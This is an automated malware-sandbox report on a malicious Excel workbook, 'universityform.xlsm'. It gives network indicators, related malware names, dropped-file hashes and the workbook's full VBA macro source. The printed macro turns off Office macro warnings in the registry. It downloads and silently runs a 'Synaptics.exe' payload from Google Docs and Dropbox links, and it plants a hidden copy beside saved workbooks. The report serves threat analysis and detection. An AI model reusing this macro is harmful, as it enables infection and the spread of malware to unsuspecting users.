docs.google.com | 172.217.18.14 | true | false | | high
www-env.dropbox-dns.com | 162.125.66.18 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
www.dropbox.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.125.66.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
172.217.18.14 | docs.google.com | United States | 15169 | GOOGLEUS | false
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1582321
              Start date and time:2024-12-30 11:10:09 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 38s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Without Instrumentation
              Number of analysed new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:universityform.xlsm
              Detection:MAL
              Classification:mal84.expl.evad.winXLSM@4/7@3/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 184.28.90.27, 52.113.194.132, 199.232.210.172, 20.189.173.14, 52.178.17.233, 20.190.160.17, 52.149.20.212, 13.107.246.45
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, onedscolprdwus13.westus.cloudapp.azure.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedscolprdweu08.westeurope.cloudapp.azure.com, uks-azsc-000.roamin
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
05:12:01 | API Interceptor | 1129x Sleep call for process: splwow64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
162.125.66.18 | https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2M | malicious | Unknown
 | bose18mkt.bat | malicious | Abobus Obfuscator
 | hnbose1711.bat | malicious | Abobus Obfuscator
 | hnl2bose13.bat | malicious | Abobus Obfuscator, Braodo
 | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator
 | 13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo
 | scut18bo03.bat | malicious | Abobus Obfuscator, Braodo
 | bose2scut18.bat | malicious | Abobus Obfuscator
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown | 13.107.246.45
 | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 13.107.246.45
 | installer64v9.5.7.msi | malicious | Unknown | 13.107.246.45
 | zhuzhu.exe | malicious | GhostRat, XRed | 13.107.246.45
 | 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe | malicious | Unknown | 13.107.246.45
 | http://nemoinsure.com | malicious | Unknown | 13.107.246.45
 | https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD | malicious | Unknown | 13.107.246.45
 | file.exe | malicious | LummaC | 13.107.246.45
 | Kellyb Timesheet Report.pdf | malicious | HTMLPhisher | 13.107.246.45
bg.microsoft.map.fastly.net | Payment-Order #24560274 for 8,380 USD.exe | malicious | AsyncRAT, PureLog Stealer, zgRAT | 199.232.214.172
 | SecuredOnedrive.ClientSetup.exe | malicious | ScreenConnect Tool | 199.232.214.172
 | dsoft.exe | malicious | Python Stealer, Creal Stealer | 199.232.210.172
 | Installer eSPT Masa PPh versi 2.0#U007e26022009.exe | malicious | BlackMoon | 199.232.210.172
 | Installer eSPT Masa PPh versi 2.0#U007e26022009.exe | malicious | BlackMoon | 199.232.214.172
 | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 199.232.214.172
 | 3KFFG52TBI.exe | malicious | Unknown | 199.232.214.172
 | a2mNMrPxow.exe | malicious | Unknown | 199.232.214.172
 | tzA45NGAW4.lnk | malicious | Unknown | 199.232.210.172
www-env.dropbox-dns.com | FLKCAS1DzH.bat | malicious | Unknown | 162.125.65.18
 | https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0 | malicious | Unknown | 162.125.65.18
 | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 162.125.65.18
 | Setup.exe | malicious | Unknown | 162.125.65.18
 | Setup.exe | malicious | Unknown | 162.125.69.18
 | https://f.io/nWWUxvn6 | malicious | HTMLPhisher | 162.125.65.18
 | hnsadjhfg18De.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
 | slifdgjsidfg19.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DROPBOXUS | FLKCAS1DzH.bat | malicious | Unknown | 162.125.65.18
 | https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0 | malicious | Unknown | 162.125.21.3
 | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 162.125.65.18
 | Setup.exe | malicious | Unknown | 162.125.69.15
 | Setup.exe | malicious | Unknown | 162.125.69.15
 | la.bot.mips.elf | malicious | Mirai | 162.125.232.208
 | https://f.io/nWWUxvn6 | malicious | HTMLPhisher | 162.125.65.18
 | hnsadjhfg18De.bat | malicious | Abobus Obfuscator, Braodo | 162.125.69.18
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook | 162.125.66.18, 172.217.18.14
 | 6QLvb9i.exe | malicious | LummaC | 162.125.66.18, 172.217.18.14
 | lumma.ps1 | malicious | LummaC | 162.125.66.18, 172.217.18.14
 | vlid_acid.exe | malicious | LummaC Stealer | 162.125.66.18, 172.217.18.14
 | AquaPac.exe | malicious | LummaC Stealer | 162.125.66.18, 172.217.18.14
 | R3nz_Loader.exe | malicious | LummaC | 162.125.66.18, 172.217.18.14
 | Loader.exe | malicious | LummaC | 162.125.66.18, 172.217.18.14
 | BasesRow.exe | malicious | LummaC | 162.125.66.18, 172.217.18.14
                              No context
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):118
                              Entropy (8bit):3.5700810731231707
                              Encrypted:false
                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                              MD5:573220372DA4ED487441611079B623CD
                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):3.459340779445105
                              Encrypted:false
                              SSDEEP:6:kKb84G7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:zHLkPlE99SCQl2DUeXJlOA
                              MD5:9A8E214F911830B9782E7D64BB6F6289
                              SHA1:BD2237256DDF0A2CCC16569D237332BF73AA45B7
                              SHA-256:9D8966AE57EDEC557B7BC776765BE108E4ECF4624B077A09D20D2DE79DB42D01
                              SHA-512:93D29CE1173EACC026B88A3582F9472398CFE160C2BF58D759C59ED63E3207F87D38F78A5C5D967C6E42665D36BC35E5024E9D484DC2BA99DCEB545794290635
                              Malicious:false
                              Reputation:low
                              Preview:p...... ..........!.Z..(..................................................@... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1002
                              Entropy (8bit):2.7135540020292455
                              Encrypted:false
                              SSDEEP:24:J3fIxk+vpCHByFQfk6ScvBZGA8xpiOnAvJ5yoIHWWKuZRy:h3+RCHBTfkpcv/GAYcvJ5LIHHKuZw
                              MD5:EC57C120D8BA66C61EB084AEA1D69624
                              SHA1:1C32A99DF245189809895D9FBF6B224C7E9C9182
                              SHA-256:73322ECB056F0B513F27BDD38F03E4B4C6B8B287384446D63D20CF654F3A5841
                              SHA-512:7F2FCDFFC68323E1E201D6B7C2627BEEF6DD0B1A7BF69CA20E16FA4BC57B9B19F4EA243E84DFD986B3723BD4D883174275C03F0A05D574AFD054830EF5583C51
                              Malicious:false
                              Reputation:low
                              Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.1.9.8.4.4.3.5.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1002
                              Entropy (8bit):2.7135540020292455
                              Encrypted:false
                              SSDEEP:24:J3fIxk+vpCHByFQfk6ScvBZGA8xpiOnAvJ5yoIHWWKuZRy:h3+RCHBTfkpcv/GAYcvJ5LIHHKuZw
                              MD5:EC57C120D8BA66C61EB084AEA1D69624
                              SHA1:1C32A99DF245189809895D9FBF6B224C7E9C9182
                              SHA-256:73322ECB056F0B513F27BDD38F03E4B4C6B8B287384446D63D20CF654F3A5841
                              SHA-512:7F2FCDFFC68323E1E201D6B7C2627BEEF6DD0B1A7BF69CA20E16FA4BC57B9B19F4EA243E84DFD986B3723BD4D883174275C03F0A05D574AFD054830EF5583C51
                              Malicious:false
                              Reputation:low
                              Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.1.2.2.3.4.3.4.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.1.9.8.4.4.3.5.,.3.7.4.6.3.7.9.,.3.7.4.6.3.6.9.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):32768
                              Entropy (8bit):3.6783090362317954
                              Encrypted:false
                              SSDEEP:192:xum3pnktfe21pkOwpYK3rcd5kM7ffi4UMF3EiRcx+NSJmmI6tNY2pC9:4m3pF29ekfnpVNUmml3Yc
                              MD5:B21A8E948DA9333042E885963CE3FFD8
                              SHA1:5D63C3C700CAF1E5A0622FE7C32C198588E90392
                              SHA-256:AA152F7251FA9BC2DAB38B70C067B657E6E2C344DE78EC327839894520D3D400
                              SHA-512:F06164145DBBD97F5368835F956ED760A2A9C4B68AAED7F7D5B333C8C049AB2FD565878B93119E2E676212C4D9818945DBEC23AF6B6DD99B5EF4FFF64BFF3E39
                              Malicious:false
                              Reputation:low
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):4.6516061071911725
                              Encrypted:false
                              SSDEEP:192:O2m3pnktfej1pkOwpYK3rcd5kM7ffi4UMF3EiRcx+NSJmmI6tNY2pC9:vm3pFj9ekfnpVNUmml3Yc
                              MD5:CD7DA0F532816E554A5E0B9695E5DE85
                              SHA1:226A3FDB580CCD3EF9DD480D25453A347AD2A7FB
                              SHA-256:12CD044C29938DDAB27983815B1AE8CC08A4B436E0D11259EC1FCD90CDA56211
                              SHA-512:A166DAD9D85FC0CCD6FD93F271874796762A5FA9CCE9ACE2EDB6DB65091395900E858ECA3F8D23BE9376B3BBAE771540891DF7D4F27FC45A93BB10F78BED9743
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-.......................................&.......................................................................................................'...(...)...*...+...,...........................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):165
                              Entropy (8bit):1.4377382811115937
                              Encrypted:false
                              SSDEEP:3:KVC+cAmltV:KVC+cR
                              MD5:9C7132B2A8CABF27097749F4D8447635
                              SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                              SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                              SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                              Malicious:true
                              Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              File type:Microsoft Excel 2007+
                              Entropy (8bit):7.918521920486396
                              TrID:
                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                              • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                              • ZIP compressed archive (8000/1) 8.38%
                              File name:universityform.xlsm
                              File size:94'222 bytes
                              MD5:d04491647385cc373152651890cbc6e0
                              SHA1:b288e5e87ce113af41881431c7004904f6d6ba89
                              SHA256:2ad9a7b364109c68f911729a3dcde001e6df45e80164f87b0054e8e78161fe99
                              SHA512:24912a2896f5a05b0d4e73740d27be623043b4ed23a30b50e75584250ecd0d50647eeeaacf6fb9fe9bfe06848e5ad435d647b01e2583796979a3aa77d769cad9
                              SSDEEP:1536:CguZCa6S5khUI6tHXchBmAXj4znOSjhLM+vGa/M1NIpPkUlB7583fjncFYIIrm0w:Cgugapkhl6tMaPjpM+d/Ms8ULavLcJ/
                              TLSH:9993F1778724791DE1A92C7BC03F6DB16528120C1F41FA8C6D4AF6CC7EDB6066A4ACC8
                              File Content Preview:PK..........!.w.6.............[Content_Types].xml ...(.........................................................................................................................................................................................................
                              Icon Hash:1d356664a4a09519
                              Document Type:OpenXML
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:True
                              Author:RPC1
                              Last Saved By:Bruno
                              Create Time:2015-01-15T16:55:01Z
                              Last Saved Time:2024-12-30T21:22:32Z
                              Creating Application:Microsoft Excel
                              Security:0
                              Thumbnail Scaling Desired:false
                              Contains Dirty Links:false
                              Shared Document:false
                              Changed Hyperlinks:false
                              Application Version:16.0300
                              General
                              Stream Path:VBA/ThisWorkbook
                              VBA File Name:ThisWorkbook.cls
                              Stream Size:11862
                              Data ASCII:. . . . . . . . . . . . . . . 8 . . . / . . . = . . . # . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . @ . . . I 9 P . 7 L S . F ' . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . O . . I - n n y . . . . . . . . . . . . . . . . . . . . . . x . . . . O . . I - n n y . I 9 P . 7 L S . F ' . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . 0 . L . . . . . 6 " . . . . . < . . . . . . . < . . . . . . . < . . . . . .
                              Data Raw:01 16 01 00 06 00 01 00 00 ec 0a 00 00 e4 00 00 00 38 02 00 00 2f 0b 00 00 3d 0b 00 00 91 23 00 00 0c 00 00 00 01 00 00 00 86 16 cf fa 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 9b c4 49 39 50 08 37 4c 83 53 bc 08 db 46 27 06 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "ThisWorkbook"
                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              Dim SheetsChanged As Boolean
                              Dim SheetCount As Integer
                              
                              Private Sub Workbook_Open()
                                Dim i As Integer
                                For i = 1 To ActiveWorkbook.Sheets.Count
                                  ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                Next i
                                
                                RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"
                                RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"
                                
                                Application.DisplayAlerts = False
                                SheetCount = Worksheets.Count
                                
                                Call MPS
                                
                                ActiveWorkbook.Sheets(1).Select
                                SheetsChanged = False
                              End Sub
                              
                              Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                If Not SheetsChanged Then
                                  ActiveWorkbook.Saved = True
                                End If
                              End Sub
                              
                              Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range)
                                SheetsChanged = True
                              End Sub
                              
                              Private Sub Workbook_NewSheet(ByVal Sh As Object)
                                SheetsChanged = True
                              End Sub
                              
                              Private Sub Workbook_SheetActivate(ByVal Sh As Object)
                                If ActiveWorkbook.Sheets.Count <> SheetCount Then
                                  SheetsChanged = True
                                  SheetCount = ActiveWorkbook.Sheets.Count
                                End If
                              End Sub
                              
                              Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
                                Dim i As Integer
                                Dim AIndex As Integer
                                Dim FName
                              
                                AIndex = ActiveWorkbook.ActiveSheet.Index
                              
                                If SaveAsUI = False Then
                                  Cancel = True
                                  Application.EnableEvents = False
                                  Application.ScreenUpdating = False
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                  Next i
                                  ActiveWorkbook.Save
                                    
                                  For i = 1 To ActiveWorkbook.Sheets.Count
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                  Next i
                                  ActiveWorkbook.Sheets(AIndex).Select
                                  SheetsChanged = False
                                  
                                  Application.ScreenUpdating = True
                                  Application.EnableEvents = True
                                Else
                                  Cancel = True
                                  Application.EnableEvents = False
                                  Application.ScreenUpdating = False
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count - 1
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetHidden
                                  Next i
                                  
                                   FName = Application.GetSaveAsFilename(fileFilter:="Excel Çalışma Kitabı (*.xlsm), *.xlsm")
                                  If FName <> False Then
                                    ActiveWorkbook.SaveAs Filename:=FName, FileFormat:=xlOpenXMLWorkbookMacroEnabled
                                    SaveAsInj ActiveWorkbook.Path
                                  End If
                                  
                                  For i = 1 To ActiveWorkbook.Sheets.Count
                                    ActiveWorkbook.Sheets(i).Visible = xlSheetVisible
                                  Next i
                                  ActiveWorkbook.Sheets(AIndex).Select
                                  SheetsChanged = False
                                      
                                  Application.ScreenUpdating = True
                                  Application.EnableEvents = True
                                End If
                              End Sub
                              
                              Sub SaveAsInj(DIR As String)
                                Dim FSO As Object
                                Dim FN As String
                                
                                Set FSO = CreateObject("scripting.filesystemobject")
                                FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                
                                If FSO.FileExists(FN) Then
                                  If Not FSO.FileExists(DIR & "\~$cache1") Then
                                    FileCopy FN, DIR & "\~$cache1"
                                  End If
                                  SetAttr (DIR & "\~$cache1"), vbHidden + vbSystem
                                End If
                              End Sub
                              
                              Function RegKeyRead(i_RegKey As String) As String
                                Dim myWS As Object
                              
                                On Error Resume Next
                                Set myWS = CreateObject("WScript.Shell")
                                RegKeyRead = myWS.RegRead(i_RegKey)
                              End Function
                              
                              Function RegKeyExists(i_RegKey As String) As Boolean
                              Dim myWS As Object
                              
                                On Error GoTo ErrorHandler
                                Set myWS = CreateObject("WScript.Shell")
                                myWS.RegRead i_RegKey
                                RegKeyExists = True
                                Exit Function
                                
                              ErrorHandler:
                                RegKeyExists = False
                              End Function
                              
                               Sub RegKeySave(i_RegKey As String, i_Value As String, Optional i_Type As String = "REG_SZ")
                              Dim myWS As Object
                              
                                Set myWS = CreateObject("WScript.Shell")
                                myWS.RegWrite i_RegKey, i_Value, i_Type
                              End Sub
                              
                              Sub MPS()
                                Dim FSO As Object
                                Dim FP(1 To 3), TMP, URL(1 To 3) As String
                                
                                Set FSO = CreateObject("scripting.filesystemobject")
                                FP(1) = ActiveWorkbook.Path & "\~$cache1"
                                FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
                              
                                URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                                URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                                TMP = Environ("Temp") & "\~$cache1.exe"
                                
                                If FSO.FileExists(FP(1)) Then
                                  If Not FSO.FileExists(TMP) Then
                                    FileCopy FP(1), TMP
                                  End If
                                  Shell TMP, vbHide
                                ElseIf FSO.FileExists(FP(2)) Then
                                  If Not FSO.FileExists(TMP) Then
                                    FileCopy FP(2), TMP
                                  End If
                                  Shell TMP, vbHide
                                Else
                                  If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                    Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                  ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                    Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                  ElseIf Not FSO.FileExists(TMP) Then
                                    If FDW((URL(1)), (TMP)) Then
                                    ElseIf FDW((URL(2)), (TMP)) Then
                                    ElseIf FDW((URL(3)), (TMP)) Then
                                    End If
                                    If FSO.FileExists(TMP) Then
                                      Shell TMP, vbHide
                                    End If
                                  Else
                                    Shell TMP, vbHide
                                  End If
                                  
                                End If
                                
                              End Sub
                              
                              Function FDW(MYU, NMA As String) As Boolean
                                Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                If WinHttpReq Is Nothing Then
                                  Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                End If
                              
                                WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                                WinHttpReq.Option(6) = AllowRedirects
                                WinHttpReq.Open "GET", MYU, False
                                WinHttpReq.Send
                                
                                If (WinHttpReq.Status = 200) Then
                                  If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
                                    FDW = True
                                    Set oStream = CreateObject("ADODB.Stream")
                                    oStream.Open
                                    oStream.Type = 1
                                    oStream.Write WinHttpReq.ResponseBody
                                    oStream.SaveToFile (NMA)
                                    oStream.Close
                                  Else
                                     FDW = False
                                  End If
                                Else
                                  FDW = False
                                End If
                              End Function
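
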